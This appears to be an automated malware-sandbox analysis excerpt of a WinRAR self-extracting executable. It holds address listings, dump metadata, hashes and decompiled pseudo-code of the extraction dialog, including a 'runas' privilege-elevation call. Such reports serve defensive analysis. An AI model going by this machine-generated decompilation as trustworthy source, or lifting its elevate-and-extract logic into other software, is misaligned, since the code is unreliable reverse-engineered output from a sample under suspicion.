                            0x009e8b83
                            0x009e8bdd
                            0x009e8bdd
                            0x009e8be0
                            0x009e8be0
                            0x00000000
                            0x009e8be0
                            0x009e8b85
                            0x009e8b8b
                            0x009e8b8d
                            0x009e8b8f
                            0x009e8bb4
                            0x009e8bba
                            0x009e8bc6
                            0x009e8bd1
                            0x009e8bda
                            0x00000000
                            0x009e8bda
                            0x009e8b91
                            0x009e8b9b
                            0x009e8b9d
                            0x009e8ba2
                            0x009e8ba8
                            0x00000000
                            0x00000000
                            0x009e8baa
                            0x00000000
                            0x00000000
                            0x009e8bac
                            0x009e8bb2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e8bb2
                            0x009e8b93
                            0x009e8b99
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e8b99
                            0x009e8b87
                            0x009e8b89
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e8b89
                            0x009e8b66
                            0x009e8b6c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e8b6c
                            0x009e8ab0
                            0x009e8ab0
                            0x009e8ab0
                            0x009e8ab0
                            0x00000000
                            0x009e8ab0
                            0x009e8a67
                            0x009e8a6a
                            0x009e8a6b
                            0x009e8a6e
                            0x009e8a70
                            0x009e8a7b
                            0x009e8a7d
                            0x009e8a8c
                            0x009e8a9e
                            0x009e8a9e
                            0x009e8a7d
                            0x00000000
                            0x009e8a6e
                            0x009e8a4c
                            0x009e8a53
                            0x009e8a5a
                            0x009e8aa5
                            0x00000000
                            0x009e8aa5
                            0x00000000
                            0x009e8a5a
                            0x009e8a06
                            0x009e8a09
                            0x009e8a10
                            0x009e8a17
                            0x009e8a1c
                            0x009e8a1e
                            0x00000000
                            0x00000000
                            0x009e8a20
                            0x009e8a22
                            0x009e8a25
                            0x009e8a25
                            0x009e8a2b
                            0x009e8a30
                            0x00000000
                            0x009e8a30
                            0x009e89d4
                            0x009e89dd
                            0x009e89de
                            0x009e89e3
                            0x009e89e6
                            0x009e89e8
                            0x009e89f0
                            0x009e89f0
                            0x009e89f2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e89f4
                            0x009e897d
                            0x009e8981
                            0x009e8987
                            0x009e898a
                            0x009e898e
                            0x009e8996
                            0x009e8997
                            0x009e899a
                            0x009e89a2
                            0x009e89a3
                            0x009e89a6
                            0x009e89a8
                            0x009e89ae
                            0x009e89b4
                            0x009e89b6
                            0x009e89bc
                            0x009e89c3
                            0x009e89c6
                            0x009e89c6
                            0x009e89b4
                            0x009e89a6
                            0x009e899a
                            0x009e898e
                            0x00000000
                            0x009e8981
                            0x009e88e5
                            0x009e88e8
                            0x00000000
                            0x00000000
                            0x009e88ee
                            0x009e88f1
                            0x009e88f4
                            0x009e88f6
                            0x00000000
                            0x00000000
                            0x009e88fc
                            0x009e88ff
                            0x00000000
                            0x00000000
                            0x009e8905
                            0x009e8908
                            0x009e890f
                            0x00000000
                            0x00000000
                            0x009e8917
                            0x009e8921
                            0x009e8926
                            0x009e8928
                            0x009e895f
                            0x009e895f
                            0x009e8963
                            0x009e89ed
                            0x00000000
                            0x009e89ed
                            0x009e8969
                            0x009e896b
                            0x009e896d
                            0x00000000
                            0x009e896d
                            0x009e892a
                            0x009e892e
                            0x00000000
                            0x00000000
                            0x009e8930
                            0x009e8938
                            0x009e8939
                            0x009e8940
                            0x009e895a
                            0x00000000
                            0x009e895a
                            0x009e8820
                            0x009e8827
                            0x00000000
                            0x00000000
                            0x009e882f
                            0x009e883a
                            0x009e883f
                            0x009e8842
                            0x009e8844
                            0x00000000
                            0x00000000
                            0x009e8846
                            0x009e884d
                            0x00000000
                            0x00000000
                            0x009e884f
                            0x009e8856
                            0x009e8860
                            0x009e8861
                            0x009e8898
                            0x009e889a
                            0x009e88a6
                            0x009e88ab
                            0x009e88ad
                            0x00000000
                            0x009e88ad
                            0x009e8863
                            0x009e8865
                            0x009e8873
                            0x009e8878
                            0x009e887c
                            0x009e8882
                            0x009e8882
                            0x009e8793
                            0x009e8778
                            0x009e877f
                            0x009e8784
                            0x009e878b
                            0x00000000
                            0x009e878b
                            0x009e871d
                            0x009e8723
                            0x009e8728
                            0x009e872a
                            0x00000000
                            0x00000000
                            0x009e872c
                            0x009e8733
                            0x009e8745
                            0x009e8747
                            0x00000000
                            0x009e8747
                            0x009e8736
                            0x009e873c
                            0x009e8741
                            0x009e8743
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e8743
                            0x009e86ec
                            0x009e86ef
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e86ef
                            0x009e86de
                            0x009e86e5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e86e5
                            0x009e86ae
                            0x009e86b5
                            0x00000000
                            0x00000000
                            0x009e86b7
                            0x009e86bb
                            0x009e86c1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e86c1
                            0x009e865f
                            0x009e8662
                            0x009e8664
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e8664
                            0x009e8636
                            0x009e863c
                            0x009e863f
                            0x009e8642
                            0x009e8644
                            0x00000000
                            0x009e864a
                            0x009e864a
                            0x009e864a
                            0x00000000
                            0x009e864a
                            0x009e8644
                            0x009e8508
                            0x009e850e
                            0x00000000
                            0x00000000
                            0x009e8510
                            0x009e8517
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e8517
                            0x009e84e1
                            0x009e84eb
                            0x009e84eb
                            0x009e84f1
                            0x00000000
                            0x009e84f1
                            0x009e84e3
                            0x009e84e9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e84e9
                            0x009e84c3
                            0x009e84cd
                            0x009e84cd
                            0x009e84d3
                            0x00000000
                            0x009e84d3
                            0x009e84c5
                            0x009e84cb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e84cb
                            0x009e842c
                            0x009e842f
                            0x009e844e
                            0x009e844e
                            0x009e8451
                            0x00000000
                            0x00000000
                            0x009e8457
                            0x009e845e
                            0x00000000
                            0x00000000
                            0x009e8469
                            0x009e846a
                            0x009e846e
                            0x009e846f
                            0x009e8470
                            0x009e8475
                            0x009e8477
                            0x009e848c
                            0x009e849d
                            0x00000000
                            0x009e8479
                            0x009e8480
                            0x00000000
                            0x009e8480
                            0x009e8477
                            0x009e8431
                            0x009e8438
                            0x00000000
                            0x009e843e
                            0x009e8449
                            0x00000000
                            0x009e8449
                            0x009e8438
                            0x009e83f5
                            0x009e8413
                            0x009e8413
                            0x00000000
                            0x009e8413
                            0x009e83f7
                            0x009e83f8
                            0x009e83fc
                            0x009e83fd
                            0x009e8405
                            0x009e841a
                            0x009e841a
                            0x00000000
                            0x009e8407
                            0x009e840e
                            0x00000000
                            0x009e840e

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prolog_memcmp
                            • String ID:
                            • API String ID: 3004599000-0
                            • Opcode ID: 47528037fcd16c4d3cf64e7f41a325d139d7f521ae5651b3f0bc7874ced4f992
                            • Instruction ID: 3dca9390c6affd29236e2201c083ce849b68f89834b362184bcb3a1ce410a2a3
                            • Opcode Fuzzy Hash: 47528037fcd16c4d3cf64e7f41a325d139d7f521ae5651b3f0bc7874ced4f992
                            • Instruction Fuzzy Hash: 5F82C3719041C5AEDF17DBA68881BFBBBADBF55300F0844BAE84D9B182DB315E84C760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FE643, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009FE643() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E009FE64F); // executed
				return _t1;
			}




                            0x009fe648
                            0x009fe64e

                            APIs
                            • SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,009FE084), ref: 009FE648
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: a63a095385ed4ee5fc518001b8e863600fca25c86c9ffebeeed0216e8e664c73
                            • Instruction ID: c532dc0ac20bcf46455867def328730404a1ad3040e84583dd4f6a4927d84dfd
                            • Opcode Fuzzy Hash: a63a095385ed4ee5fc518001b8e863600fca25c86c9ffebeeed0216e8e664c73
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FA5D1, Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E009FA5D1(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				struct HWND__* _t152;
				void* _t163;
				void* _t166;
				int _t169;
				void* _t182;
				struct HWND__* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				void* _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t254;
				WCHAR* _t255;
				int _t259;
				int _t261;
				void* _t266;
				void* _t270;
				signed short _t275;
				int _t277;
				struct HWND__* _t279;
				WCHAR* _t286;
				WCHAR* _t288;
				intOrPtr _t290;
				void* _t299;
				void* _t300;
				struct HWND__* _t302;
				signed int _t305;
				void* _t306;
				struct HWND__* _t308;
				void* _t310;
				long _t312;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;

				_t299 = __edx;
				_t285 = __ecx;
				E009FD870(E00A114F6, _t321);
				E009FD940();
				_t275 =  *(_t321 + 0x10);
				_t305 =  *(_t321 + 0xc);
				_t302 =  *(_t321 + 8);
				if(E009E12D7(_t299, _t302, _t305, _t275,  *(_t321 + 0x14), L"STARTDLG", 0, 0) == 0) {
					_t306 = _t305 - 0x110;
					__eflags = _t306;
					if(__eflags == 0) {
						E009FC343(_t299, __eflags, __fp0, _t302);
						_t105 =  *0xa2b704;
						_t277 = 1;
						 *0xa275d8 = _t302;
						 *0xa275c8 = _t302;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t302, 0x80, 1, _t105); // executed
						}
						_t106 =  *0xa35d04;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t302, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t302, 0x68);
						 *(_t321 + 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E009F95F8(_t321 - 0x1164, 0x800);
						_t111 = GetDlgItem(_t302, 0x66);
						__eflags =  *0xa29602;
						_t308 = _t111;
						 *(_t321 + 0x10) = _t308;
						_t286 = 0xa29602;
						if( *0xa29602 == 0) {
							_t286 = _t321 - 0x1164;
						}
						SetWindowTextW(_t308, _t286);
						E009F9A32(_t308); // executed
						_push(0xa275e4);
						_push(0xa275e0);
						_push(0xa3ce18);
						_push(_t302);
						 *0xa275d6 = 0; // executed
						_t114 = E009F9EEF(_t286, _t299, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0xa275d1 = _t277;
						}
						__eflags =  *0xa275e4;
						if( *0xa275e4 > 0) {
							_push(7);
							_push( *0xa275e0);
							_push(_t302);
							E009FB4C7(_t299);
						}
						__eflags =  *0xa3de20;
						if( *0xa3de20 == 0) {
							SetDlgItemTextW(_t302, 0x6b, E009EDA42(_t286, 0xbf));
							SetDlgItemTextW(_t302, _t277, E009EDA42(_t286, 0xbe));
						}
						__eflags =  *0xa275e4;
						if( *0xa275e4 <= 0) {
							L103:
							__eflags =  *0xa275d6;
							if( *0xa275d6 != 0) {
								L114:
								__eflags =  *0xa295fc - 2;
								if( *0xa295fc == 2) {
									EnableWindow(_t308, 0);
								}
								__eflags =  *0xa285f8;
								if( *0xa285f8 != 0) {
									E009E1294(_t302, 0x67, 0);
									E009E1294(_t302, 0x66, 0);
								}
								_t115 =  *0xa295fc;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0xa275d7;
									if( *0xa275d7 == 0) {
										_push(0);
										_push(_t277);
										_push(0x111);
										_push(_t302);
										__eflags = _t115 - _t277;
										if(_t115 != _t277) {
											 *0xa1df38();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0xa275d1;
								if( *0xa275d1 != 0) {
									SetDlgItemTextW(_t302, _t277, E009EDA42(_t286, 0x90));
								}
								goto L125;
							}
							__eflags =  *0xa3ce0c;
							if( *0xa3ce0c != 0) {
								goto L114;
							}
							__eflags =  *0xa295fc;
							if( *0xa295fc != 0) {
								goto L114;
							}
							__eflags = 0;
							_t310 = 0xaa;
							 *((short*)(_t321 - 0x9688)) = 0;
							do {
								__eflags = _t310 - 0xaa;
								if(_t310 != 0xaa) {
									L109:
									__eflags = _t310 - 0xab;
									if(__eflags != 0) {
										L111:
										E009EFA89(__eflags, _t321 - 0x9688, " ", 0x2000);
										E009EFA89(__eflags, _t321 - 0x9688, E009EDA42(_t286, _t310), 0x2000);
										goto L112;
									}
									__eflags =  *0xa3de20;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0xa3de20;
								if( *0xa3de20 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t310 = _t310 + 1;
								__eflags = _t310 - 0xb0;
							} while (__eflags <= 0);
							_t286 =  *0xa275e8; // 0x0
							E009F8FE6(_t286, __eflags,  *0xa20064,  *(_t321 + 0x14), _t321 - 0x9688, 0, 0);
							_t308 =  *(_t321 + 0x10);
							goto L114;
						} else {
							_push(0);
							_push( *0xa275e0);
							_push(_t302); // executed
							E009FB4C7(_t299); // executed
							_t133 =  *0xa3ce0c;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0xa295fc;
								if(__eflags == 0) {
									_t288 =  *0xa275e8; // 0x0
									E009F8FE6(_t288, __eflags,  *0xa20064,  *(_t321 + 0x14), _t133, 0, 0);
									L00A02B4E( *0xa3ce0c);
									_pop(_t286);
								}
							}
							__eflags =  *0xa295fc - _t277;
							if( *0xa295fc == _t277) {
								L102:
								_push(_t277);
								_push( *0xa275e0);
								_push(_t302);
								E009FB4C7(_t299);
								goto L103;
							} else {
								 *0xa1df3c(_t302);
								__eflags =  *0xa295fc - _t277;
								if( *0xa295fc == _t277) {
									goto L102;
								}
								__eflags =  *0xa29601;
								if( *0xa29601 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0xa275e0);
								_push(_t302);
								E009FB4C7(_t299);
								__eflags =  *0xa3de18;
								if( *0xa3de18 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0xa20064, L"LICENSEDLG", 0, E009FA3E1, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0xa275d7 = _t277;
									L26:
									_push(_t277);
									L13:
									EndDialog(_t302, ??); // executed
									L125:
									_t116 = _t277;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t321 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t306 != 1;
					if(_t306 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t275 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0xa275d0;
						if( *0xa275d0 != 0) {
							L23:
							_t312 = 0x800;
							GetDlgItemTextW(_t302, 0x66, _t321 - 0x2164, 0x800);
							__eflags =  *0xa275d0;
							if( *0xa275d0 == 0) {
								__eflags =  *0xa275d1;
								if( *0xa275d1 == 0) {
									_t152 = GetDlgItem(_t302, 0x68);
									__eflags =  *0xa275cc;
									_t279 = _t152;
									if( *0xa275cc == 0) {
										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
										SendMessageW(_t279, 0xc2, 0, 0xa122e4);
										_t312 = 0x800;
									}
									SetFocus(_t279);
									__eflags =  *0xa285f8;
									if( *0xa285f8 == 0) {
										E009EFAB1(_t321 - 0x1164, _t321 - 0x2164, _t312);
										E009FC10F(_t285, _t321 - 0x1164, _t312);
										E009E3E41(_t321 - 0x4288, 0x880, E009EDA42(_t285, 0xb9), _t321 - 0x1164);
										_t323 = _t323 + 0x10;
										_t163 = _t321 - 0x4288;
									} else {
										_t163 = E009EDA42(_t285, 0xba);
									}
									E009FC190(0, _t163);
									__eflags =  *0xa29601;
									if( *0xa29601 == 0) {
										E009FC7FC(_t321 - 0x2164);
									}
									_push(0);
									_push(_t321 - 0x2164);
									 *(_t321 + 0x17) = 0;
									_t166 = E009E9D3A(0, _t321);
									_t277 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t300 = E009F9A8D(_t321 - 0x2164);
										 *((char*)(_t321 + 0x13)) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											L43:
											_t169 =  *(_t321 + 0x17);
											L44:
											_t285 =  *0xa29601;
											__eflags = _t285;
											if(_t285 != 0) {
												L50:
												__eflags =  *((char*)(_t321 + 0x13));
												if( *((char*)(_t321 + 0x13)) != 0) {
													 *0xa275dc = _t277;
													E009E12B2(_t302, 0x67, 0);
													E009E12B2(_t302, 0x66, 0);
													SetDlgItemTextW(_t302, _t277, E009EDA42(_t285, 0xe6)); // executed
													E009E12B2(_t302, 0x69, _t277);
													SetDlgItemTextW(_t302, 0x65, 0xa122e4); // executed
													_t315 = GetDlgItem(_t302, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0xa275e0);
													_push(_t302);
													E009FB4C7(_t300);
													_push(2);
													_push( *0xa275e0);
													_push(_t302);
													E009FB4C7(_t300);
													_push(0xa3ce18);
													_push(_t302);
													 *0xa3fe3c = _t277; // executed
													E009FC6FF(_t285, __eflags); // executed
													_push(6);
													_push( *0xa275e0);
													 *0xa3fe3c = 0;
													_push(_t302);
													E009FB4C7(_t300);
													__eflags =  *0xa275d7;
													if( *0xa275d7 == 0) {
														__eflags =  *0xa275cc;
														if( *0xa275cc == 0) {
															__eflags =  *0xa3de2c;
															if( *0xa3de2c == 0) {
																_push(4);
																_push( *0xa275e0);
																_push(_t302);
																E009FB4C7(_t300);
															}
														}
													}
													E009E1294(_t302, _t277, _t277);
													 *0xa275dc =  *0xa275dc & 0x00000000;
													__eflags =  *0xa275dc;
													_t182 =  *0xa275d7; // 0x1
													goto L75;
												}
												__eflags = _t285;
												_t169 = (_t169 & 0xffffff00 | _t285 != 0x00000000) - 0x00000001 &  *(_t321 + 0x17);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t321 + 0x17) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t321 + 0x17);
													if( *(_t321 + 0x17) != 0) {
														_push(E009EDA42(_t285, 0x9a));
														E009E3E41(_t321 - 0x5688, 0xa00, L"\"%s\"\n%s", _t321 - 0x2164);
														E009E6E03(0xa200e0, _t277);
														E009F9735(_t302, _t321 - 0x5688, E009EDA42(0xa200e0, 0x96), 0x30);
														 *0xa275cc =  *0xa275cc + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t321 - 0x1164, 0x800);
												_t285 = 0xa2b602;
												E009EE7AA(0xa2b602, _t321 - 0x164, 0x80);
												_push(0xa2a602);
												E009E3E41(_t321 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t321 - 0x2164);
												_t323 = _t323 + 0x14;
												 *(_t321 - 0x48) = 0x3c;
												 *((intOrPtr*)(_t321 - 0x44)) = 0x40;
												 *((intOrPtr*)(_t321 - 0x38)) = _t321 - 0x1164;
												 *((intOrPtr*)(_t321 - 0x34)) = _t321 - 0x11ca0;
												 *(_t321 - 0x40) = _t302;
												 *((intOrPtr*)(_t321 - 0x3c)) = L"runas";
												 *(_t321 - 0x2c) = _t277;
												 *((intOrPtr*)(_t321 - 0x28)) = 0;
												 *((intOrPtr*)(_t321 - 0x30)) = 0xa275f8;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t321 + 8) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t321 + 0x10) =  *(_t321 + 0x14);
												} else {
													 *0xa35d08 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E009EFAB1(0xa35d0a, _t231, 0x2000);
													}
													E009FA24E(_t285, 0xa39d0a, 7);
													E009FA24E(_t285, 0xa3ad0a, 2);
													E009FA24E(_t285, 0xa3bd0a, 0x10);
													 *0xa3ce0b = _t277;
													_t285 = 0xa3cd0a;
													E009EE90C(_t277, 0xa3cd0a, _t321 - 0x164);
													 *(_t321 + 0x10) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E009FEA80(_t238, 0xa35d08, 0x7104);
													_t323 = _t323 + 0xc;
												}
												_t220 = ShellExecuteExW(_t321 - 0x48);
												E009EE957(_t321 - 0x164, 0x80);
												E009EE957(_t321 - 0x11ca0, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t321 + 0x10);
													 *(_t321 + 0x17) = _t277;
													goto L64;
												} else {
													 *0xa1df20( *(_t321 - 0x10), 0x2710);
													_t71 = _t321 + 0xc;
													 *_t71 =  *(_t321 + 0xc) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t321 + 0x10);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t321 + 0xc) + 1;
														 *(_t321 + 0xc) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0xa3de2c =  *(_t321 - 0x10);
													L64:
													__eflags =  *(_t321 + 8);
													if( *(_t321 + 8) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t321 + 8));
													}
													goto L66;
												}
											}
											__eflags = _t300;
											if(_t300 == 0) {
												goto L52;
											}
											E009E3E41(_t321 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t323 = _t323 + 0x10;
											E009E943C(_t321 - 0x3188);
											 *(_t321 - 4) =  *(_t321 - 4) & 0x00000000;
											_push(0x11);
											_push(_t321 - 0x1164);
											_t246 = E009E9528(_t321 - 0x3188);
											 *((char*)(_t321 + 0x13)) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t321 + 0x17) = _t277;
												}
											}
											_t39 = _t321 - 4;
											 *_t39 =  *(_t321 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E009E946E(_t321 - 0x3188); // executed
											_t285 =  *0xa29601;
											goto L50;
										}
										_t248 = GetLastError();
										_t300 =  *((intOrPtr*)(_t321 + 0x13));
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t277;
										 *(_t321 + 0x17) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t321 + 0x17) = _t277;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t277 = 1;
									_t182 = 1;
									 *0xa275d7 = 1;
									L75:
									__eflags =  *0xa275cc;
									if( *0xa275cc <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0xa275d0 = _t277;
									SetDlgItemTextW(_t302, _t277, E009EDA42(_t285, 0x90));
									_t290 =  *0xa200e0; // 0x0
									__eflags = _t290 - 9;
									if(_t290 != 9) {
										__eflags = _t290 - 3;
										_t189 = ((0 | _t290 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t321 + 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E009EDA42(_t290, 0x96);
									E009F9735(_t302, E009EDA42(_t290, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t277 = 1;
							__eflags =  *0xa275d1;
							if( *0xa275d1 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0xa3fe3c;
						if( *0xa3fe3c == 0) {
							goto L23;
						} else {
							__eflags =  *0xa3fe3d;
							_t254 = _t149 & 0xffffff00 |  *0xa3fe3d == 0x00000000;
							__eflags = _t254;
							 *0xa3fe3d = _t254;
							_t255 = E009EDA42((0 | _t254 != 0x00000000) + 0xe6, (0 | _t254 != 0x00000000) + 0xe6);
							_t277 = 1;
							SetDlgItemTextW(_t302, 1, _t255);
							while(1) {
								__eflags =  *0xa3fe3d;
								if( *0xa3fe3d == 0) {
									goto L125;
								}
								__eflags =  *0xa275d7;
								if( *0xa275d7 != 0) {
									goto L125;
								}
								_t259 = GetMessageW(_t321 - 0x64, 0, 0, 0);
								__eflags = _t259;
								if(_t259 == 0) {
									goto L125;
								} else {
									_t261 = IsDialogMessageW(_t302, _t321 - 0x64);
									__eflags = _t261;
									if(_t261 == 0) {
										TranslateMessage(_t321 - 0x64);
										DispatchMessageW(_t321 - 0x64);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t266 = _t149 - 1;
					__eflags = _t266;
					if(_t266 == 0) {
						_t277 = 1;
						__eflags =  *0xa275dc;
						 *0xa275d7 = 1;
						if( *0xa275dc == 0) {
							goto L12;
						}
						__eflags =  *0xa275cc;
						if( *0xa275cc != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t266 == 0x65;
					if(_t266 == 0x65) {
						_t270 = E009E1217(_t302, E009EDA42(_t285, 0x64), _t321 - 0x1164);
						__eflags = _t270;
						if(_t270 != 0) {
							SetDlgItemTextW(_t302, 0x66, _t321 - 0x1164);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}























































                            0x009fa5d1
                            0x009fa5d1
                            0x009fa5d6
                            0x009fa5e0
                            0x009fa5e6
                            0x009fa5ea
                            0x009fa5ee
                            0x009fa607
                            0x009fa611
                            0x009fa611
                            0x009fa617
                            0x009facb3
                            0x009facb8
                            0x009facbf
                            0x009facc0
                            0x009facc6
                            0x009faccc
                            0x009facce
                            0x009facd8
                            0x009facd8
                            0x009facde
                            0x009face3
                            0x009face5
                            0x009facf2
                            0x009facf2
                            0x009fad01
                            0x009fad10
                            0x009fad13
                            0x009fad25
                            0x009fad2d
                            0x009fad2f
                            0x009fad37
                            0x009fad39
                            0x009fad3c
                            0x009fad41
                            0x009fad43
                            0x009fad43
                            0x009fad4b
                            0x009fad52
                            0x009fad57
                            0x009fad5c
                            0x009fad61
                            0x009fad66
                            0x009fad67
                            0x009fad6e
                            0x009fad73
                            0x009fad75
                            0x009fad77
                            0x009fad77
                            0x009fad7d
                            0x009fad84
                            0x009fad86
                            0x009fad88
                            0x009fad8e
                            0x009fad8f
                            0x009fad8f
                            0x009fad94
                            0x009fad9b
                            0x009fadab
                            0x009fadbe
                            0x009fadbe
                            0x009fadc4
                            0x009fadcb
                            0x009fae7c
                            0x009fae7c
                            0x009fae83
                            0x009faf2c
                            0x009faf2c
                            0x009faf33
                            0x009faf38
                            0x009faf38
                            0x009faf3e
                            0x009faf45
                            0x009faf4c
                            0x009faf56
                            0x009faf56
                            0x009faf5b
                            0x009faf60
                            0x009faf62
                            0x009faf64
                            0x009faf6b
                            0x009faf6d
                            0x009faf6f
                            0x009faf70
                            0x009faf75
                            0x009faf76
                            0x009faf78
                            0x009faf82
                            0x009faf7a
                            0x009faf7a
                            0x009faf7a
                            0x009faf78
                            0x009faf6b
                            0x009faf88
                            0x009faf8f
                            0x009faf9e
                            0x009faf9e
                            0x00000000
                            0x009faf8f
                            0x009fae89
                            0x009fae90
                            0x00000000
                            0x00000000
                            0x009fae96
                            0x009fae9d
                            0x00000000
                            0x00000000
                            0x009faea3
                            0x009faea5
                            0x009faeaa
                            0x009faeb1
                            0x009faeb1
                            0x009faeb7
                            0x009faec2
                            0x009faec2
                            0x009faec8
                            0x009faed3
                            0x009faee4
                            0x009faefc
                            0x00000000
                            0x009faefc
                            0x009faeca
                            0x009faed1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009faed1
                            0x009faeb9
                            0x009faec0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009faf01
                            0x009faf01
                            0x009faf02
                            0x009faf02
                            0x009faf0a
                            0x009faf24
